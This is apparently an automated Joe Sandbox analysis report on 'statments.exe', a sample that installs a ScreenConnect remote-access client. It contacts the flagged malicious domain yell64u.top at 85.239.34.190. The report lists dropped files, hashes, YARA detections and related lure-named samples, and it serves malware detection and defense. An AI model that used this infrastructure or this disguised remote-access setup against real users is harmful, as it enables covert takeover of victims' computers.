                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsCredentialProvider.dll | 0% | ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI2F66.tmp | 0% | ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\Microsoft.Deployment.Compression.Cab.dll | 0% | ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\Microsoft.Deployment.Compression.dll | 0% | ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll | 0% | ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\Microsoft.Deployment.WindowsInstaller.dll | 0% | ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\ScreenConnect.Core.dll | 0% | ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\ScreenConnect.InstallerActions.dll | 0% | ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\ScreenConnect.Windows.dll | 0% | ReversingLabs
                              C:\Windows\Installer\MSI3C77.tmp | 0% | ReversingLabs
                              C:\Windows\Installer\MSI3F66.tmp | 0% | ReversingLabs
                              No Antivirus matches
                              No Antivirus matches
                              Source | Detection | Scanner | Label | Link
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
                              https://feedback.screenconnect.com/Feedback.axd | 0% | URL Reputation | safe
                              Name | IP | Active | Malicious | Antivirus Detection | Reputation
                              yell64u.top | 85.239.34.190 | true | true | | unknown
                              Name | Source | Malicious | Antivirus Detection | Reputation
                              http://wixtoolset.org/releases/ | rundll32.exe, 00000005.00000003.1572578801.0000000004352000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1572760296.0000000004253000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1572578801.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr | false | | unknown
                              http://wixtoolset.org/news/ | rundll32.exe, 00000005.00000003.1572578801.0000000004352000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1572760296.0000000004253000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1572578801.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr | false | | unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | ScreenConnect.ClientService.exe, 00000008.00000002.2793225366.00000000015DA000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1677731349.0000000002791000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                              http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v | rundll32.exe, 00000005.00000003.1572578801.0000000004352000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1572760296.0000000004253000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1572578801.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr | false | | unknown
                              https://feedback.screenconnect.com/Feedback.axd | ScreenConnect.Core.dll.3.dr | false | URL Reputation: safe | unknown
                              https://docs.rs/getrandom#nodejs-es-module-support | ScreenConnect.WindowsCredentialProvider.dll.3.dr | false | | unknown
• IP: 85.239.34.190, Domain: yell64u.top, Country: Russian Federation, ASN: 134121, ASN Name: RAINBOW-HKRainbownetworklimitedHK, Malicious: true
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1536325
                                        Start date and time:2024-10-17 20:02:05 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 8m 31s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:15
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:statments.exe
                                        Detection:MAL
                                        Classification:mal42.evad.winEXE@17/56@1/1
                                        EGA Information:
                                        • Successful, ratio: 60%
                                        HCA Information:
                                        • Successful, ratio: 69%
                                        • Number of executed functions: 261
                                        • Number of non-executed functions: 5
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Execution Graph export aborted for target rundll32.exe, PID 2288 because it is empty
                                        • Execution Graph export aborted for target statments.exe, PID 2564 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                        • VT rate limit hit for: statments.exe
                                        No simulations
Match: 85.239.34.190
• Associated Sample Name / URL: sstatment.exe, Detection: malicious, Threat Name: ScreenConnect Tool
Match: yell64u.top
• Associated Sample Name / URL: sstatment.exe, Detection: malicious, Threat Name: ScreenConnect Tool, Context: 85.239.34.190
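Match: RAINBOW-HKRainbownetworklimitedHK
• Associated Sample Name / URL: w6S2C7s1fv.elf, Detection: malicious, Threat Name: Unknown, Context: 85.239.34.134
• Associated Sample Name / URL: 55YxZeS0MZ.elf, Detection: malicious, Threat Name: Unknown, Context: 85.239.34.134
• Associated Sample Name / URL: c8p9czsIyN.exe, Detection: malicious, Threat Name: LummaC, Context: 85.239.33.148
• Associated Sample Name / URL: sstatment.exe, Detection: malicious, Threat Name: ScreenConnect Tool, Context: 85.239.34.190
• Associated Sample Name / URL: aa.LnK.lnk, Detection: malicious, Threat Name: Unknown, Context: 102.165.46.145
• Associated Sample Name / URL: lK1DKi27B4.dll, Detection: malicious, Threat Name: Unknown, Context: 85.239.52.252
• Associated Sample Name / URL: lK1DKi27B4.dll, Detection: malicious, Threat Name: Unknown, Context: 85.239.52.252
• Associated Sample Name / URL: nPyo7vtpRl.dll, Detection: malicious, Threat Name: Unknown, Context: 45.86.230.68
• Associated Sample Name / URL: rdl3kBqbTy.dll, Detection: malicious, Threat Name: Unknown, Context: 45.86.230.68
• Associated Sample Name / URL: nPyo7vtpRl.dll, Detection: malicious, Threat Name: Unknown, Context: 45.86.230.68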
                                          No context
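Match: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll
• Associated Sample Name / URL: Scanned01Document_ms.exe, Detection: malicious, Threat Name: ScreenConnect Tool
• Associated Sample Name / URL: Scanned01Document_ms.exe, Detection: malicious, Threat Name: ScreenConnect Tool
• Associated Sample Name / URL: sstatment.exe, Detection: malicious, Threat Name: ScreenConnect Tool
• Associated Sample Name / URL: extukGiBrn.exe, Detection: malicious, Threat Name: ScreenConnect Tool
• Associated Sample Name / URL: Vh0tTzx4Ko.exe, Detection: malicious, Threat Name: ScreenConnect Tool
• Associated Sample Name / URL: support.Client.exe, Detection: malicious, Threat Name: ScreenConnect Tool
• Associated Sample Name / URL: support.Client.exe, Detection: malicious, Threat Name: ScreenConnect Tool
• Associated Sample Name / URL: ScreenConnect.ClientSetup (1).exe, Detection: malicious, Threat Name: ScreenConnect Tool
• Associated Sample Name / URL: ScreenConnect.ClientSetup (1).exe, Detection: malicious, Threat Name: ScreenConnect Tool
• Associated Sample Name / URL: Scan_doc_09_16_24_1120.exe, Detection: malicious, Threat Name: ScreenConnect Tool
Match: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll
• Associated Sample Name / URL: Scanned01Document_ms.exe, Detection: malicious, Threat Name: ScreenConnect Tool
• Associated Sample Name / URL: Scanned01Document_ms.exe, Detection: malicious, Threat Name: ScreenConnect Tool
• Associated Sample Name / URL: sstatment.exe, Detection: malicious, Threat Name: ScreenConnect Tool
• Associated Sample Name / URL: extukGiBrn.exe, Detection: malicious, Threat Name: ScreenConnect Tool
• Associated Sample Name / URL: Vh0tTzx4Ko.exe, Detection: malicious, Threat Name: ScreenConnect Tool
• Associated Sample Name / URL: support.Client.exe, Detection: malicious, Threat Name: ScreenConnect Tool
• Associated Sample Name / URL: support.Client.exe, Detection: malicious, Threat Name: ScreenConnect Tool
• Associated Sample Name / URL: ScreenConnect.ClientSetup (1).exe, Detection: malicious, Threat Name: ScreenConnect Tool
• Associated Sample Name / URL: ScreenConnect.ClientSetup (1).exe, Detection: malicious, Threat Name: ScreenConnect Tool
• Associated Sample Name / URL: Scan_doc_09_16_24_1120.exe, Detection: malicious, Threat Name: ScreenConnect Tool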
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:modified
                                                                                  Size (bytes):219650
                                                                                  Entropy (8bit):6.582107710120155
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:CZ9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMGG:CZuH2aCGw1ST1wQLdqvG
                                                                                  MD5:C62CB09F8B9B909B87D96C8BE0F4DD0B
                                                                                  SHA1:BA7A4A13EE0DA3D3094A3E9BFEF01AE21F07F2B8
                                                                                  SHA-256:90BE31E49917C87F215D1D84F1A0E32B6EA66C8D8759A3DC9FDB236A688A889F
                                                                                  SHA-512:0D774DD8C3835FE641C94C3381274D1E1960B728B204FA210BB4A9501100F99828912DC0CED915D96045EFCE424B03F470DB4E835A6745212F6A38430C15F13F
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\4d36d9.rbs, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Preview:...@IXOS.@.....@jpQY.@.....@.....@.....@.....@.....@......&.{080BBA10-81D8-D25A-4C52-E7D1AC89AA1E}'.ScreenConnect Client (de5851ad6e374ce3)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{080BBA10-81D8-D25A-4C52-E7D1AC89AA1E}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (de5851ad6e374ce3)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{AF52190F-9138-8DD5-E284-9AF07DDE1216}&.{080BBA10-81D8-D25A-4C52-E7D1AC89AA1E}.@......&.{5462DCDA-B5AB-15F8-7838-2A54948A34EB}&.{080BBA10-81D8-D25A-4C52-E7D1AC89AA1E}.@......&.{41277B46-8511-4FBD-DF82-7BFA9BAEED18}&.{080BBA10-81D8-D25A-4C52-E7D1AC89AA1E}.@......&.{E2565D0B-BCDD-C1A1-A2A2-7660FC61A23D}&.{080BBA10-81D8-D25A-4C52-E7D1AC89AA1E}.@......&.{A9BEA7A3-6285-A159-CBF3-596C269E6678}&.{080BBA10-81D8-D25A-4C52-E7D1AC89AA1E}.@......&.{567A6AC5-C59B-6D1E-4D5E-D3E6B358A6AB}&.{080BBA10-81D8-D25A-4C52-E7D1AC89AA1E}.@....
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):652
                                                                                  Entropy (8bit):4.646296001566109
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:rHy2DLI4MWonY6c/KItfU49cAjUPDLm184c7eA7d5TlO5FMDKt5cFqu+HIR:zHE4rbM2xjU7M8LD7DTlcFq0qEIR
                                                                                  MD5:8B45555EF2300160892C25F453098AA4
                                                                                  SHA1:0992EBA6A12F7A25C1F50566BEEB3A72D4B93461
                                                                                  SHA-256:75552351B688F153370B86713C443AC7013DF3EE8FCAC004B2AB57501B89B225
                                                                                  SHA-512:F99FF9A04675E11BAF1FD2343AB9CE3066BAB32E6BD18AEA9344960BF0A14AF8191DDCCA8431AD52D907BCB0CB47861FFB2CD34655F1852D51E04ED766F03505
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP....4..2...n_Q2T}........Z...5...........0A.p.p.l.i.c.a.t.i.o.n.D.i.r.e.c.t.o.r.y.N.a.m.e..... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....2B.l.a.n.k.M.o.n.i.t.o.r.M.e.s.s.a.g.e.F.o.r.m.a.t.....RE.n.d.P.o.i.n.t.S.t.a.t.u.s.S.l.e.e.p.i.n.g.F.o.r.F.r.e.e.L.i.c.e.n.s.e.T.i.t.l.e.F...FS.e.s.s.i.o.n.I.n.v.a.l.i.d.S.e.s.s.i.o.n.D.e.l.e.t.e.d.M.e.s.s.a.g.e.t.....Support..Support.2Software is Updating.Do not turn off your computer.,Not enough data receiving from host computer..Removed
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):21018
                                                                                  Entropy (8bit):7.841465962209068
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:rcoN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dH:P4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4Bd
                                                                                  MD5:EF6DBD4F9C3BB57F1A2C4AF2847D8C54
                                                                                  SHA1:41D9329C5719467E8AE8777C2F38DE39F02F6AE4
                                                                                  SHA-256:0792210DE652583423688FE6ACAE19F3381622E85992A771BF5E6C5234DBEB8E
                                                                                  SHA-512:5D5D0505874DC02832C32B05F7E49EAD974464F6CB50C27CE9393A23FF965AA66971B3C0D98E2A4F28C24147FCA7A0A9BFD25909EC7D5792AD40CED7D51ED839
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):50133
                                                                                  Entropy (8bit):4.759054454534641
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                  MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                  SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                  SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                  SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):26722
                                                                                  Entropy (8bit):7.7401940386372345
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                  MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                  SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                  SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                  SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):197120
                                                                                  Entropy (8bit):6.58476728626163
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                  MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                  SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                  SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                                  SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
• Filename: Scanned01Document_ms.exe, Detection: malicious
• Filename: Scanned01Document_ms.exe, Detection: malicious
• Filename: sstatment.exe, Detection: malicious
• Filename: extukGiBrn.exe, Detection: malicious
• Filename: Vh0tTzx4Ko.exe, Detection: malicious
• Filename: support.Client.exe, Detection: malicious
• Filename: support.Client.exe, Detection: malicious
• Filename: ScreenConnect.ClientSetup (1).exe, Detection: malicious
• Filename: ScreenConnect.ClientSetup (1).exe, Detection: malicious
• Filename: Scan_doc_09_16_24_1120.exe, Detection: malicious
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):68096
                                                                                  Entropy (8bit):6.068776675019683
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                  MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                  SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                  SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                  SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
• Filename: Scanned01Document_ms.exe, Detection: malicious
• Filename: Scanned01Document_ms.exe, Detection: malicious
• Filename: sstatment.exe, Detection: malicious
• Filename: extukGiBrn.exe, Detection: malicious
• Filename: Vh0tTzx4Ko.exe, Detection: malicious
• Filename: support.Client.exe, Detection: malicious
• Filename: support.Client.exe, Detection: malicious
• Filename: ScreenConnect.ClientSetup (1).exe, Detection: malicious
• Filename: ScreenConnect.ClientSetup (1).exe, Detection: malicious
• Filename: Scan_doc_09_16_24_1120.exe, Detection: malicious
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):95520
                                                                                  Entropy (8bit):6.505346220942731
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                                  MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                                  SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                                  SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                                  SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):548864
                                                                                  Entropy (8bit):6.031251664661689
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                  MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                  SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                  SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                  SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):1721856
                                                                                  Entropy (8bit):6.639136400085158
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                  MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                  SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                  SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                  SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):260168
                                                                                  Entropy (8bit):6.416438906122177
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:qJvChyA4m2zNGvxDd6Q6dtaVNVrlaHpFahvJ9ERnWtMG8Ff2lt9Bgcld5aaYxg:0IvxDdL6d8VNdlC3g0RCXh5D
                                                                                  MD5:5ADCB5AE1A1690BE69FD22BDF3C2DB60
                                                                                  SHA1:09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
                                                                                  SHA-256:A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
                                                                                  SHA-512:812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):61216
                                                                                  Entropy (8bit):6.31175789874945
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                                  MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                                  SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                                  SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                                  SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):266
                                                                                  Entropy (8bit):4.842791478883622
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):601376
                                                                                  Entropy (8bit):6.185921191564225
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                  MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                  SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                  SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                  SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):266
                                                                                  Entropy (8bit):4.842791478883622
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                  Malicious:true
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):842248
                                                                                  Entropy (8bit):6.268561504485627
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:q9vy8YABMuiAoPyEIrJs7jBjaau+EAaMVtw:P8Y4MuiAoPyZrJ8jrvDVtw
                                                                                  MD5:BE74AB7A848A2450A06DE33D3026F59E
                                                                                  SHA1:21568DCB44DF019F9FAF049D6676A829323C601E
                                                                                  SHA-256:7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
                                                                                  SHA-512:2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
                                                                                  Malicious:false
